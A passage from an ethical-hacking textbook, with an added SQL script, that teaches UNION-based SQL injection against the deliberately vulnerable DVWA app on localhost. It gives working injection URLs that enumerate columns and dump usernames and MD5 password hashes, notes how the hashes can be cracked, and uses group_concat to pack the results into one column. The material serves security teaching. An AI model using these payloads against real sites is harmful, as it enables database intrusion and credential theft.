Extracting Columns from Tables
The next step is to find all the columns in the "users" table. The information_schema.columns table lists every column of every table in the databases the current user can access; its column_name column holds the column names. Filtering on table_schema alone would return the columns of every table in the dvwa database, so we also filter on table_name to restrict the output to the "users" table. The syntax is as follows:
Syntax
http://localhost/index.php?support=yes' and 1=0 UNION select 1,2,3,column_name,5,6 from information_schema.columns where table_schema='dvwa' and table_name='users'--+
350 ◾ Ethical Hacking and Penetration Testing Guide
We have managed to extract all the columns available in the “users” table.
Extracting Data from Columns
The final step is to extract the data stored in the "users" table, which holds the username, password, and other details of each user. We will extract the following columns: first_name, last_name, user, and password.
Syntax
http://localhost/index.php?support=yes' and 1=0 UNION select 1,first_name,last_name,user,password,6 from dvwa.users--+
We have now retrieved the usernames, passwords, and other details of all the users in the "users" table. The passwords are stored as MD5 hashes, which can be cracked with online hash lookup services, brute forcing, rainbow tables, and similar tools.
Using group_concat
In this case we were able to echo the data back through all of the UNION columns. In most cases, however, only one or two of the columns are actually displayed on the page. In such cases you can use group_concat to pack the data from several columns and rows into a single echoed column.
Syntax
http://localhost/index.php?support=yes' and 1=0 UNION select 1,2,3,group_concat(user,0x3a,password),5,6 from dvwa.users--+
The 0x3a is the hex encoding of a colon (:); it separates the user and password values within each row without needing a quoted string literal, and group_concat separates the rows with a comma by default. Note that group_concat output is truncated at group_concat_max_len (1024 bytes by default), so on a large table you may have to page through the rows with LIMIT instead of pulling them all in one request.
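The following MySQL script is an added worked example, not code from the book: it reconstructs the three UNION payloads above (column enumeration, row extraction, and group_concat packing) as plain queries that can be run in a MySQL or MariaDB client against a constructed copy of the DVWA users table. It assumes the vulnerable query returns six columns (matching the 1..6 placeholders in the payloads); the table definition and its two rows are constructed sample data, not DVWA's real contents.

```sql
-- Added example (not from the book): the page's UNION payloads run directly
-- against a constructed copy of dvwa.users. Column layout follows the four
-- columns the text names; the rows are made-up sample data.
CREATE DATABASE IF NOT EXISTS dvwa;
USE dvwa;

CREATE TABLE IF NOT EXISTS users (
  user_id    INT PRIMARY KEY,
  first_name VARCHAR(15),
  last_name  VARCHAR(15),
  user       VARCHAR(15),
  password   VARCHAR(32)   -- MD5 hex digest, as DVWA stores it
);

INSERT INTO users VALUES
  (1, 'admin',  'admin', 'admin',   MD5('password')),
  (2, 'Gordon', 'Brown', 'gordonb', MD5('abc123'));

-- Step 1: enumerate the columns of the users table. Filtering on table_schema
-- alone returns the columns of every table in dvwa; table_name narrows it.
-- (In the injected payload, "and 1=0" in front of UNION drops the original rows.)
SELECT 1, 2, 3, column_name, 5, 6
  FROM information_schema.columns
 WHERE table_schema = 'dvwa' AND table_name = 'users';

-- Step 2: one row per user, usable when every UNION column is echoed.
SELECT 1, first_name, last_name, user, password, 6 FROM dvwa.users;

-- Step 3: only one echoed column available: pack user:password pairs into it.
-- 0x3a is ':' written as a hex literal, so no quoted string is needed.
SELECT 1, 2, 3, GROUP_CONCAT(user, 0x3a, password SEPARATOR ','), 5, 6
  FROM dvwa.users;

-- Caveat: GROUP_CONCAT output is cut off at group_concat_max_len
-- (1024 bytes by default), so large tables need LIMIT/OFFSET paging.
SELECT @@group_concat_max_len;
```

Each SELECT corresponds to the part of the payload after `UNION` in the page's URLs; the surrounding `support=yes' and 1=0 ... --+` wrapper is what turns it into an injection, and the trailing `--+` comments out whatever the application appends after the injected value.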